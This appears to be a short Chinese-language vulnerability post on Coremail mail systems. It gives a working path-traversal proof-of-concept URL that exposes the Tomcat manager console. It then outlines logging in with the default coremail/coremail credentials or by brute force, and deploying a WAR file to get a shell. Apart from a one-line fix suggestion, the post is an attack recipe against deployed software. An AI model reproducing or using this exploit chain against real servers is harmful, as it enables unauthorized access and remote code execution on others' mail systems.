# Coremail邮箱系统 目录穿越泄漏后台漏洞
## 漏洞复现
`POC:url+/lunkr/cache/;/;/../../manager.html`
访问过去会直接跳转到tomcat控制台,这里你就可以采用coremail/coremail弱口令尝试登陆,或者暴力破解。然后就是部署war包Getshell就ok了。
修复建议:对外隐藏tomcat控制台,修改默认口令。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容